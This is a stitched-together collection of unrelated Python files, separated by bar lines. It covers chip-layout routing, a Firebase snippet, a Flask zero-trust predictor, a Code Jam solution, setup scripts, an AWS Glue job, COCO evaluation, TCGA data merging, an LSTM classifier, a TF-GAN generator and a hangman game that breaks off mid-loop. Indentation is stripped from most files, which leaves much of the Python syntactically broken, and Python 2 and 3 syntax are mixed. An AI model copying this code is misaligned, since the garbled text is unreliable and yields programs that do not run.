adnetl.connect( 'vn%d' % i, f, ('%s%d' % (a,i)))
#top and bot
for i in range(n-3-k):
sy = 0
fy = n-1
sx = n-2-i
fx = n-3-k-i
adnetl.addInstance( ADI( ndev, ("up%d" % i), ADITransform.translate( xg(sx), yg(sy))))
adnetl.addInstance( ADI( pdev, ("vp%d" % i), mirrorAcrossYAxis( pdev).preMult( ADITransform.translate( xg(fx), yg(fy)))))
for (f,a) in [('g','a'),('d','b'),('s','c')]:
adnetl.connect( 'up%d' % i, f, ('%s%d' % (a,i)))
adnetl.connect( 'vp%d' % i, f, ('%s%d' % (a,i)))
adnetl.genNetlist( netl)
hly = "metal4"
hWidth = tech.halfWidthM4[0]*2
vly = "metal5"
vWidth = tech.halfWidthM5[0]*2
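  # Global routes for the left/right device pairs: each net i/o/z is routed with an
  # H-V-H pattern -- horizontal on metal4 from the left edge, a vertical metal5 jog at
  # column n-2-i, then horizontal on metal4 to the right edge.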
for i in range(n-3-k):
sx = 0
fx = n-1
mx = n-2-i
sy = n-2-i
fy = n-3-k-i
for p in ['i','o','z']:
netl.newGR( ('%s%d' % (p,i)), Rect( sx, sy, mx, sy), hly, hWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( mx, sy, mx, fy), vly, vWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( mx, fy, fx, fy), hly, hWidth)
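  # Global routes for the top/bottom device pairs: nets a/b/c use the mirrored V-H-V
  # pattern -- vertical on metal5, a horizontal metal4 jog at row n-3-i-k, then vertical
  # on metal5.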
for i in range(n-3-k):
sy = 0
fy = n-1
my = n-3-i-k
sx = n-2-i
fx = n-3-k-i
for p in ['a','b','c']:
netl.newGR( ('%s%d' % (p,i)), Rect( sx, sy, sx, my), vly, vWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( sx, my, fx, my), hly, hWidth)
netl.newGR( ('%s%d' % (p,i)), Rect( fx, my, fx, fy), vly, vWidth)
pathlib.Path("INPUT").mkdir(parents=True, exist_ok=True)
tech.write_files( "INPUT", netl.nm, netl.bbox.toList())
netl.write_files( tech, "INPUT", args)
|
"""
Currently, the code is tested by running:
https://github.com/Minyus/pipelinex_pytorch/blob/master/main.py
# TODO: Add test code.
"""
|
import firebase_admin
from firebase_admin import credentials, firestore
cred = credentials.Certificate("./bnode-2cd0d-firebase-adminsdk-eyxsn-c90ed335bb.json")
firebase_admin.initialize_app(cred)
db = firestore.client()
docs = db.collection('users').get()
for doc in docs:
print(doc.to_dict())
data = {
u'name': u'Los Angeles',
u'state': u'CA',
u'country': u'USA'
}
# Add a new doc in collection 'cities' with ID 'LA'
db.collection(u'cities').document(u'LA').set(data) |
from flask import Flask, redirect, render_template, request, flash, url_for, session
import numpy as np
import pickle
from settings.settings import DEV
app = Flask(__name__)
app.config.from_object(DEV)
# load model
with open('model.pkl', 'rb') as file:
model = pickle.load(file)
@app.route("/", methods=["GET","POST"])
def index():
if request.method == "POST":
institution =request.form['institution']
sda =request.form['sda']
sdwan =request.form['sdwan']
sddc =request.form['sddc']
segmentation =request.form['segmentation']
encryption =request.form['encryption']
mfa =request.form['mfa']
sso =request.form['sso']
policy_engine =request.form['policy_engine']
mdm =request.form['mdm']
dlp =request.form['dlp']
response_list = [institution, sda, sdwan, sddc, segmentation, encryption, mfa, sso, policy_engine, mdm, dlp ]
float_resp_list = list(map(lambda x: float(x), response_list))
# make prediction using model loaded
        prediction = model.predict(np.array(float_resp_list).reshape(1, -1))
recommend = {}
# print("jjjj",float_resp_list)
if float_resp_list[6] != 5:
recommend["MFA"] = "Adopt multifactor authentication to help protect your applications by requiring users to confirm their identity using a second source of validation, such as a phone or token, before access is granted."
if float_resp_list[7] != 5:
recommend["SSO"] ="Adopt SSO not only strengthens security by removing the need to manage multiple credentials for the same person but also delivers a better user experience with fewer sign-in prompts."
if float_resp_list[5] != 1:
recommend["Encryption"] = "At a minimum, setup encrypted admin access and embark to encrypt all traffic as organizations that fail to protect data in transit are more susceptible to man-in-the- middle attacks, eavesdropping, and session hijacking. These attacks can be the first step attackers use to gain access to confidential data."
if float_resp_list[4] != 1:
recommend["Segmention"]= "Implement network segmentation through software-defined perimeters to reduce the lateral movement of threats."
if float_resp_list[-1] != 1:
recommend["DLP"] = "Adopt Data Loss Prevention Mechanisms. Once data access is granted, controlling what the user can do with your data is critical. For example, if a user accesses a document with a corporate identity, you want to prevent that document from being saved in an unprotected consumer storage location, or from being shared with a consumer communication or chat app."
if float_resp_list[-3] != 1:
recommend["Policy Engine"] = "Implement network access control to enforce granular control with risk-based adaptive access policies that integrate across endpoints, apps, and networks to better protect your data."
if float_resp_list[-2] != 5:
recommend["MDM"] ="Set up Mobile Device Management for internal users. MDM solutions enable endpoint provisioning, configuration, automatic updates, device wipe, and other remote actions."
flash("Successfully Returned Zero Trust Level Prediction", 'success')
return redirect(url_for("results", res=prediction, recom=recommend))
return render_template("index.html")
@app.route("/results/<res>/<recom>", methods=["GET"])
def results(res, recom):
# Prediction Cleaning
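    # `res` arrives as the string form of a nested numpy array via the URL, so strip the
    # surrounding brackets and newlines, parse the floats, and format them as percentages.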
r = [i.replace("\n", "") for i in list(res[2:-2].split(" ")) if i != ""]
s = [f'{float(j):.5f}' for j in r]
t = [(str(round((float(i)*100), 2)) + "%") for i in s]
# Recom Cleaning
import ast
print("res 2", type((recom)))
res = ast.literal_eval(recom)
print("recommendations afre", res)
return render_template("results.html", results=t,recom=res)
if __name__ == "__main__":
app.run(debug=True) |
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 2 - Problem A. Minimum Sort
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435915/00000000007dc51c
#
# Time: O(ClogN) = C/N + C/(N-1) + ... + C/2 = 4.187 * 10^8 (given N = 100, C = 10^8)
# Space: O(1)
#
# Usage: python interactive_runner.py python3 testing_tool.py -- python minimum_sort.py
#
from sys import stdout
def query(i, j):
print "M %s %s" % (i, j)
stdout.flush()
return input()
def swap(i, j):
print "S %s %s" % (i, j)
stdout.flush()
return input()
def done():
print "D"
stdout.flush()
return input()
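# Selection sort driven by the judge: for each position i, ask for the index of the
# minimum element in the suffix [i, N] (query "M i N") and swap it into place, giving
# the total cost C/N + C/(N-1) + ... + C/2 noted in the header comment.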
def minimum_sort():
for i in xrange(1, N):
idx = query(i, N)
if idx != i:
swap(i, idx)
if done() != 1:
exit()
T, N = map(int, raw_input().strip().split())
for case in xrange(T):
minimum_sort()
|
from setuptools import setup, find_packages
VERSION = "1.0.1"
def read_file(filepath):
with open(filepath) as f:
return f.read()
setup(
name="django-seo2",
version=VERSION,
description="A framework for managing SEO metadata in Django.",
long_description=read_file('README.rst'),
url="https://github.com/romansalin/django-seo2",
author="Roman Salin",
author_email="[email protected]",
keywords="seo django framework",
license="MIT",
include_package_data=True,
zip_safe=False,
packages=find_packages(exclude=["docs*", "tests*"]),
install_requires=[],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Indexing/Search",
"Topic :: Internet :: WWW/HTTP :: Site Management",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
],
test_suite="tests.runtests.runtests",
)
|
#openfi
#escape char in the olxlo produced file will need substitute at later date
#for runtime on the second loop of instantiation self.populate
dxpone = {
"name":"dxpone",
"refapione":"dxponeapione --- Hi and welcome to the text case scenario that will be used to insert \
towards a discord or something similar to justify the text that will be written to it as an extension \
for demonstration purposes that will become more prevalent in the future usages of this written programme",
"refapitwo":"dxponeapitwo",
"com":["""###codeblockhere###"""]
}
#closefi |
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue.dynamicframe import DynamicFrame
#Retrieve parameters for the Glue job.
args = getResolvedOptions(sys.argv, ['JOB_NAME', 'S3_SOURCE', 'S3_DEST',
'TRAIN_KEY', 'VAL_KEY'])
sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)
#Create a PySpark dataframe from the source table.
source_data_frame = spark.read.load(args['S3_SOURCE'], format='csv',
inferSchema=True, header=True)
# Drop unused columns
columns_to_drop = ['Phone', 'Day Charge', 'Eve Charge', 'Night Charge', 'Intl Charge']
source_data_frame = source_data_frame.drop(*columns_to_drop)
# Change data type of 'Area Code' columns to string
# source_data_frame['Area Code'] = source_data_frame['Area Code'].astype(object) # in Pandas
source_data_frame = source_data_frame.withColumn('Area Code', source_data_frame['Area Code'].cast('string'))
print("source_data_frame before get_dummies:", source_data_frame.columns)
import pyspark.sql.functions as F
# model_data = pd.get_dummies(source_data_frame) # in Pandas
def get_col_dummies(df, col_name):
categ = df.select(col_name).distinct().rdd.flatMap(lambda x:x).collect()
exprs = [F.when(F.col(col_name) == cat,1).otherwise(0)\
.alias('`'+col_name+'_'+str(cat)+'`') for cat in categ]
df = df.select(exprs+df.columns)
print('Columns before dropping the original one in get dummies:', df.columns)
df = df.drop(col_name)
return df
categorical_cols = ['Area Code', 'Churn?', "Int'l Plan", 'State', 'VMail Plan']
for cat_col in categorical_cols:
print('Creating dummy for column', cat_col)
source_data_frame = get_col_dummies(source_data_frame, cat_col)
print("source_data_frame after get_dummies:", source_data_frame.columns)
source_data_frame = source_data_frame.drop('Churn?_False.')
cols = source_data_frame.columns
y = cols.pop()
cols.insert(0,y)
# Reorder columns, putting the target variable 'Churn?' as the first column
source_data_frame = source_data_frame.select(cols)
#Split the dataframe in to training and validation dataframes.
train_data, val_data = source_data_frame.randomSplit([.7,.3])
#Write both dataframes to the destination datastore.
train_path = args['S3_DEST'] + args['TRAIN_KEY']
val_path = args['S3_DEST'] + args['VAL_KEY']
train_data.write.save(train_path, format='csv', mode='overwrite', header=True)
val_data.write.save(val_path, format='csv', mode='overwrite', header=True)
#Complete the job.
job.commit()
|
#%% Generate graphs with the operating points
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
ground_truth_file = 'mscoco_ground_truth.json'
predictions_file = 'mscoco_predictions.json'
# initialize COCO ground truth api
cocoGt = COCO(ground_truth_file)
# initialize COCO detections api
cocoDt = cocoGt.loadRes(predictions_file)
imgIds=sorted(cocoGt.getImgIds())
annType = 'bbox'
# running evaluation
cocoEval = COCOeval(cocoGt, cocoDt, annType)
cocoEval.params.imgIds = imgIds
cocoEval.params.catIds = [1]
cocoEval.analyze_thresholds(save_to_dir='.', confidence_thresholds=[0.5, 0.6, 0.7], catIds=[1])
|
from django.core.management.base import BaseCommand, CommandError
from crowdataapp.models import Document
import re
import csv
class Command(BaseCommand):
help = 'Report weird numbers on entries.'
def handle(self, *args, **options):
documents = Document.objects.filter(verified=True)
with open('docs_with_several_verified_entries.csv', 'wb') as csvfile:
impwriter = csv.writer(csvfile, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
# report on documents validated more than once
for doc in documents:
form_entries = doc.form_entries.all()
form_fields = doc.document_set.form.all()[0].fields.filter(verify=True)
if len(form_entries) > 2:
verified_entry_count = 0
for fe in form_entries:
fe_to_dict = fe.to_dict()
#print "-------- For entry user %s." % fe_to_dict['username']
if fe_to_dict['answer_Adjudicatario_verified'] or \
fe_to_dict['answer_Tipo de gasto_verified'] or \
fe_to_dict['answer_Importe total_verified']:
verified_entry_count += 1
if verified_entry_count > 1:
print "The doc %s has more than one entry verified." % doc.id
doc.unverify()
doc.verify()
impwriter.writerow([doc.id, doc.verified])
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
tcga_path = './data/tcga/'
sample_sheet = pd.read_table(tcga_path + 'metadata/full_transcriptome_sample_sheet.txt')
#Function for removing decimals off ENSG gene names
cut_decimal = np.vectorize(lambda x : x.split('.')[0])
def prep_single_sample_metadata(sample_metadata):
"""
Function For Parsing Single Row in Metadata
"""
fileID = sample_metadata['File ID']
fileName = sample_metadata['File Name']
caseID = sample_metadata['Sample ID']
return {'directory': fileID, 'fileName':fileName, 'barcode':caseID}
def parse_single_sample(sample_dict, protein_coding_genes):
"""
Function for Reading in single sample and parsing it
"""
data_path = tcga_path + '/transcriptomics/'
sample_data = pd.read_table(data_path + sample_dict['directory'] + '/' + sample_dict['fileName'], header=None, index_col=0)[1]
sample_data.index = cut_decimal(sample_data.index)
sample_data /= sample_data.sum()
sample_data *= 10e6
sample_data.name = sample_dict['barcode']
sample_data = sample_data[protein_coding_genes].dropna()
return sample_data
#Read in protein coding gene list
protein_coding_genes = np.genfromtxt('./data/protein_coding_genes.txt',dtype=str)
protein_coding_genes = cut_decimal(protein_coding_genes)
df = pd.DataFrame()
for row in sample_sheet.index:
sample_dict = prep_single_sample_metadata(sample_sheet.loc[row,:])
df[sample_dict['barcode']] = parse_single_sample(sample_dict, protein_coding_genes)
df.to_csv('./data/tcga/merged_tcga_data.txt.gz', sep='\t', compression='gzip')
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
setup_args = generate_distutils_setup(
packages=['ekf_localization'],
package_dir={'':'msgs_lib'}
)
setup(**setup_args)
|
from src import app
app.run(debug=True, host="0.0.0.0", port=5000)
|
from engine.views.wavefront_parsers import ObjectParser
with open("objects/cockpit.obj", 'r') as f:
object_file_data = f.readlines()
class TestIntegratingObjectParser(object):
def setup(self):
self.parser = ObjectParser()
self.target = self.parser.parse(object_file_data)
def test_object_has_faces(self):
assert len(self.target._faces) > 0
|
def complexfunc(courses, grades=None):
    # default grade thresholds, used when no grades dict is supplied
    if grades is None:
        grades = {"compilers": 10}
    print courses[0]
    print grades["compilers"]
    if courses[0] < grades["compilers"]:
        print "everything is ok"
test = complexfunc([200020])
|
from flask import request
from werkzeug import exceptions
from backend.app import app, db
from backend.models import Card
@app.route("/model", methods=["GET", "POST"])
def example():
if request.method == "POST":
if request.is_json:
data = request.get_json()
new_model = Card(data)
db.session.add(new_model)
db.session.commit()
return {"message": f"Created {new_model.name} with id {new_model.id}"}
else:
return {"message": "Invalid json!"}, exceptions.BadRequest.code
elif request.method == "GET":
models = Card.query.all()
return {"items": models}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
description = """ Extract physiological log files from encoded "_PHYSIO" DICOM file generated by CMRR MB sequences
and convert them to BIDS compliance format """
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except(IOError, ImportError):
long_description = open('README.md').read()
from setuptools import setup
DISTNAME = "cmrr2bids"
DESCRIPTION = description
VERSION = "0.0.1"
AUTHOR = "CoAxLab"
AUTHOR_EMAIL = "[email protected]"
URL = "https://github.com/CoAxLab/Cmrr2Bids"
DOWNLOAD_URL = URL + "/archive/" + VERSION + ".tar.gz"
ENTRY_POINTS = {
"console_scripts": [
"cmrr2bids = cmrr2bids.cmrr2bids:main"],
}
if __name__ == "__main__":
setup(
name=DISTNAME,
version=VERSION,
description=description,
long_description=long_description,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
download_url=DOWNLOAD_URL,
packages=['cmrr2bids'],
entry_points= ENTRY_POINTS,
install_requires = ['future>=0.16.0',
'pydicom>=1.3.0'],
#'Cmrr2Log @ git+git://github.com/CoAxLab/Cmrr2Log@master#egg=Cmrr2Log'],
dependency_links=['http://github.com/CoAxLab/Cmrr2Log/master#egg=Cmrr2Log']
)
|
from django.core.management.base import BaseCommand, CommandError
from arxiv import models, tasks
class Command(BaseCommand):
"""Send a test email to verify mail server configuration"""
def add_arguments(self, parser):
parser.add_argument('recipient')
def handle(self, *args, **kwargs):
# make a temporary subscriber
subscriber = models.Subscriber.objects.create(email=kwargs['recipient'], timezone='UTC')
try:
subscriber.subjects = models.Subject.objects.all()
tasks.email_feed(subscriber)
finally:
subscriber.delete()
|
"""Long Short Term Memory Network Classifier python module
website references:
https://www.kaggle.com/ternaryrealm/lstm-time-series-explorations-with-keras"""
import time
import itertools
import os
from os import listdir
from os.path import isfile, join
from numpy import genfromtxt
import numpy as np
from keras.models import Sequential
from keras.layers import LSTM, Dense
from keras.wrappers.scikit_learn import KerasRegressor
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.utils import to_categorical
from sklearn.ensemble import AdaBoostClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
import matplotlib.pyplot as plt
# fix random seed for reproducibility
# seed = 7
# np.random.seed(seed)
# Disable tensorflow warning messages
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Data Parameters
NUM_CLASS = 4 # Change to two for Healthy vs Diseased binary classification
NUM_FEATURES = 20
NUM_TIME_SERIES = 90000
NUM_TS_CROP = 20000 # time series data cropped by NUM_TS_CROP/2 on start and end
NUM_SKIP_SAMP = 5 # number of time series samples to skip over (after crop)
# Split Parameters
NUM_K_SPLIT = 5  # number of k-fold splits into training and test sets
VAL_SPLIT = 0.3 # validation set split from split training set (randomized for each k fold cross validation)
# Run Parameters
NUM_LSTM_CELLS = 50
NUM_EPOCH = 20
BATCH_SIZE = 500
if NUM_CLASS == 4:
LABEL_CTRL = 0
LABEL_ALS = 1
LABEL_HUNT = 2
LABEL_PARK = 3
n_outputs = 4
    class_names = ['Control', 'ALS', 'Huntington', 'Parkinson']
else:
LABEL_CTRL = 0
LABEL_ALS = 1
LABEL_HUNT = 1
LABEL_PARK = 1
n_outputs = 1
class_names = ['Healthy', 'Diseased']
def load_data(folder):
file_list = [f for f in listdir(folder) if isfile(join(folder, f))]
# Labels for time series data
y = []
b = 0
X_file_list = []
B_file_list = []
print('Loading: label | file')
for file_name in file_list:
if 'als' in file_name:
y.append(LABEL_ALS)
X_file_list.append(file_name)
print(LABEL_ALS, end='')
elif 'control' in file_name:
y.append(LABEL_CTRL)
X_file_list.append(file_name)
print(LABEL_CTRL, end='')
elif 'hunt' in file_name:
y.append(LABEL_HUNT)
X_file_list.append(file_name)
print(LABEL_HUNT, end='')
elif 'park' in file_name:
y.append(LABEL_PARK)
X_file_list.append(file_name)
print(LABEL_PARK, end='')
elif 'blind' in file_name:
b += 1
B_file_list.append(file_name)
print('?', end='')
else:
print('~', end='')
print(' |', file_name)
print('b =', b)
# Time series data, (only using leg 0 for the time being)
X = np.empty([len(y), NUM_TIME_SERIES, NUM_FEATURES], float)
B = np.empty([b, NUM_TIME_SERIES, NUM_FEATURES], float)
    for f_i in range(len(X_file_list)):
        if any(x in X_file_list[f_i] for x in ['als', 'control', 'hunt', 'park']):
            data = genfromtxt(folder + X_file_list[f_i], delimiter=',', dtype=float)
            X[f_i] = data
for b_i in range(b):
data = genfromtxt(folder + 'blind' + str(b_i+1) + '.tsv', delimiter=',', dtype=float)
B[b_i] = data
# Crop time series data
X_crop = X[:, int(NUM_TS_CROP / 2):int(NUM_TIME_SERIES - NUM_TS_CROP / 2), :]
B_crop = B[:, int(NUM_TS_CROP / 2):int(NUM_TIME_SERIES - NUM_TS_CROP / 2), :]
# Downsample time series data
X_half = X_crop[:, 0::NUM_SKIP_SAMP, :]
B_half = B_crop[:, 0::NUM_SKIP_SAMP, :]
# Convert nan to 0
for s in range(X_half.shape[0]):
for t in range(X_half.shape[1]):
for f in range(X_half.shape[2]):
if np.isnan(X_half[s, t, f]):
X_half[s, t, f] = 0
for s in range(B_half.shape[0]):
for t in range(B_half.shape[1]):
for f in range(B_half.shape[2]):
if np.isnan(B_half[s, t, f]):
B_half[s, t, f] = 0
# Assert no Inf or nan data
    assert not np.isnan(X_half).any()
    assert not np.isnan(B_half).any()
X_final = X_half
B_final = B_half
return X_final, np.asarray(y), B_final
def baseline_model(num_lstm_cells=NUM_LSTM_CELLS, num_time_series=(NUM_TIME_SERIES-NUM_TS_CROP)):
# initialize a sequential keras model
model = Sequential()
# Input:
model.add(Dense(NUM_FEATURES, activation='sigmoid',
input_shape=(num_time_series, NUM_FEATURES)))
# LSTM Master Layer
model.add(LSTM(num_lstm_cells,
dropout=0.1,
recurrent_dropout=0.1,
return_sequences=True
# input_shape=(num_time_series, NUM_FEATURES
)
)
# LSTM Support Layer
model.add(LSTM(NUM_CLASS))
# Output: Dense Layer Classifier
# compile and fit our model
if NUM_CLASS == 2:
model.add(Dense(n_outputs, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
elif NUM_CLASS == 4:
model.add(Dense(n_outputs, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
# Run the following script using the following command via "python -m LSTMN.py"
if __name__ == "__main__":
# Time Start
start_time = time.time()
project_folder = '/media/alexanderfernandes/6686E8B186E882C3/Users/alexanderfernandes/Code/BIOM5405-ClassProject/'
# project_folder = 'D:/Users/Documents/School/Grad/BIOM5405/project/BIOM5405-ClassProject/'
    X_total, y_total, B_total = load_data(project_folder + 'data/')  # blind samples unused here
print('X_total =', X_total.shape)
print('y_total = ', y_total.tolist())
LSTM_CELLS = [2, 10, 25, 50, 100]
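    # Sweep over the candidate LSTM cell counts above; each iteration runs a full
    # stratified k-fold cross validation with its own train/validation/test splits.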
for lstmncell in range(5):
n_timesteps = X_total.shape[1]
n_features = X_total.shape[2]
print("Number Classes:", n_outputs)
print("Cropped Time Series Length:", n_timesteps)
print("Number Features:", NUM_FEATURES)
# define 5-fold cross validation test harness
kfold = StratifiedKFold(n_splits=NUM_K_SPLIT, shuffle=True)
cvscores = []
cm_sum = None
# Bagging
nbags = 5
fold_number = 1 # Print logging counter
for train_index, test_index in kfold.split(X_total, y_total):
print("CV Fold %d/%d" % (fold_number, NUM_K_SPLIT))
fold_number += 1
X_train, X_test = X_total[train_index], X_total[test_index]
y_train, y_test = y_total[train_index], y_total[test_index]
if NUM_CLASS == 4:
y_train = to_categorical(y_train, num_classes=n_outputs)
y_test = to_categorical(y_test, num_classes=n_outputs)
print("TRAIN/VAL:", len(train_index), train_index.tolist())
print("TEST:", len(test_index), test_index.tolist())
# Split validation set from the training set
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=VAL_SPLIT)
# Regular Model
            model = baseline_model(num_lstm_cells=LSTM_CELLS[lstmncell], num_time_series=n_timesteps)
model.fit(X_train, y_train,
validation_data=(X_val, y_val),
epochs=NUM_EPOCH,
batch_size=BATCH_SIZE,
verbose=2)
scores = model.evaluate(X_test, y_test, verbose=2)
print("%s: %.2f%%" % (model.metrics_names[1], scores[1] * 100))
            cvscores.append(scores[1] * 100)
y_pred = model.predict(X_test, batch_size=BATCH_SIZE)
print("y_test:", y_test)
print("y_pred:", y_pred)
# classify output predictions
if NUM_CLASS == 2:
y_pred = (y_pred > 0.5)
elif NUM_CLASS == 4:
y_ohe = y_pred
y_pred = []
for y in y_ohe:
mx = 0
mx_i = None
for i in range(4):
if y[i] > mx:
mx_i = i
mx = y[i]
y_pred.append(mx_i)
y_ohe = y_test
y_test = []
for y in y_ohe:
mx = 0
mx_i = None
for i in range(4):
if y[i] > mx:
mx_i = i
mx = y[i]
y_test.append(mx_i)
print("y_test:", y_test)
print("y_pred:", y_pred)
# confusion matrix
if cm_sum is None:
cm_sum = confusion_matrix(y_test, y_pred)
else:
cm_sum += confusion_matrix(y_test, y_pred)
print("%.2f%% (+/- %.2f%%)" % (np.mean(cvscores), np.std(cvscores)))
# # Plot non-normalized confusion matrix
# plt.figure()
# plot_confusion_matrix(cm_sum, classes=class_names, title='Confusion matrix, without normalization')
# Time End
elapsed_time = time.time()
hours, rem = divmod(elapsed_time - start_time, 3600)
minutes, seconds = divmod(rem, 60)
print("Elapsed Time: {:0>2}:{:0>2}:{:05.2f}".format(int(hours), int(minutes), seconds))
# plt.show()
|
import os
DIR_NEW_TEMPLATE = 'new_templates'
NEW_PROJECT_DIR_NAME_PREFIX = 'designer_'
NEW_TEMPLATE_IMAGE_PATH = os.path.join(DIR_NEW_TEMPLATE, 'images')
DIR_PROFILES = 'profiles'
DESIGNER_CONFIG_FILE_NAME = 'config.ini'
|
# coding=utf-8
# Copyright 2019 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions of generator functions."""
import tensorflow as tf
from tensorflow_gan.examples.self_attention_estimator import ops
def make_z_normal(num_batches, batch_size, z_dim):
"""Make random noise tensors with normal distribution.
Args:
num_batches: copies of batches
batch_size: the batch_size for z
z_dim: The dimension of the z (noise) vector.
Returns:
zs: noise tensors.
"""
shape = [num_batches, batch_size, z_dim]
z = tf.random.normal(shape, name='z0', dtype=tf.float32)
return z
def make_class_labels(batch_size, num_classes):
"""Generate class labels for generation."""
# Uniform distribution.
  # TODO(augustusodena) Use true distribution of ImageNet classes.
gen_class_logits = tf.zeros((batch_size, num_classes))
gen_class_ints = tf.random.categorical(logits=gen_class_logits, num_samples=1)
gen_class_ints.shape.assert_has_rank(2)
gen_class_ints = tf.squeeze(gen_class_ints, axis=1)
gen_class_ints.shape.assert_has_rank(1)
return gen_class_ints
def usample(x):
"""Upsamples the input volume.
Args:
x: The 4D input tensor.
Returns:
An upsampled version of the input tensor.
"""
# Allow the batch dimension to be unknown at graph build time.
_, image_height, image_width, n_channels = x.shape.as_list()
# Add extra degenerate dimension after the dimensions corresponding to the
# rows and columns.
expanded_x = tf.expand_dims(tf.expand_dims(x, axis=2), axis=4)
# Duplicate data in the expanded dimensions.
after_tile = tf.tile(expanded_x, [1, 1, 2, 1, 2, 1])
return tf.reshape(after_tile,
[-1, image_height * 2, image_width * 2, n_channels])
def block(x, labels, out_channels, num_classes, name, training=True):
"""Builds the residual blocks used in the generator.
Args:
x: The 4D input tensor.
labels: The labels of the class we seek to sample from.
out_channels: Integer number of features in the output layer.
num_classes: Integer number of classes in the labels.
name: The variable scope name for the block.
training: Whether this block is for training or not.
Returns:
A `Tensor` representing the output of the operation.
"""
with tf.compat.v1.variable_scope(name):
bn0 = ops.ConditionalBatchNorm(num_classes, name='cbn_0')
bn1 = ops.ConditionalBatchNorm(num_classes, name='cbn_1')
x_0 = x
x = tf.nn.relu(bn0(x, labels))
x = usample(x)
x = ops.snconv2d(x, out_channels, 3, 3, 1, 1, training, 'snconv1')
x = tf.nn.relu(bn1(x, labels))
x = ops.snconv2d(x, out_channels, 3, 3, 1, 1, training, 'snconv2')
x_0 = usample(x_0)
x_0 = ops.snconv2d(x_0, out_channels, 1, 1, 1, 1, training, 'snconv3')
return x_0 + x
def generator(zs, target_class, gf_dim, num_classes, training=True):
"""Builds the generator segment of the graph, going from z -> G(z).
Args:
zs: Tensor representing the latent variables.
target_class: The class from which we seek to sample.
gf_dim: The gf dimension.
num_classes: Number of classes in the labels.
training: Whether in train mode or not. This affects things like batch
normalization and spectral normalization.
Returns:
- The output layer of the generator.
    - A list containing all trainable variables defined by the model.
"""
with tf.compat.v1.variable_scope(
'generator', reuse=tf.compat.v1.AUTO_REUSE) as gen_scope:
act0 = ops.snlinear(
zs, gf_dim * 16 * 4 * 4, training=training, name='g_snh0')
act0 = tf.reshape(act0, [-1, 4, 4, gf_dim * 16])
# pylint: disable=line-too-long
act1 = block(act0, target_class, gf_dim * 16, num_classes, 'g_block1', training) # 8
act2 = block(act1, target_class, gf_dim * 8, num_classes, 'g_block2', training) # 16
act3 = block(act2, target_class, gf_dim * 4, num_classes, 'g_block3', training) # 32
act3 = ops.sn_non_local_block_sim(act3, training, name='g_ops') # 32
act4 = block(act3, target_class, gf_dim * 2, num_classes, 'g_block4', training) # 64
act5 = block(act4, target_class, gf_dim, num_classes, 'g_block5', training) # 128
bn = ops.BatchNorm(name='g_bn')
act5 = tf.nn.relu(bn(act5))
act6 = ops.snconv2d(act5, 3, 3, 3, 1, 1, training, 'g_snconv_last')
out = tf.nn.tanh(act6)
var_list = tf.compat.v1.get_collection(
tf.compat.v1.GraphKeys.TRAINABLE_VARIABLES, gen_scope.name)
return out, var_list
|
import random
import os
def read_data(filepath="./archivos/data.txt"):
words = []
with open(filepath, "r", encoding="utf-8") as f:
for line in f:
words.append(line.strip().upper())
return words
def run():
data = read_data(filepath="./archivos/data.txt")
chosen_word = random.choice(data)
chosen_word_list = [letter for letter in chosen_word]
chosen_word_list_underscores = ["_"] * len(chosen_word_list)
letter_index_dict = {}
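    # Map each letter of the chosen word to every index where it appears, so a correct
    # guess reveals all of its occurrences at once.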
for idx, letter in enumerate(chosen_word):
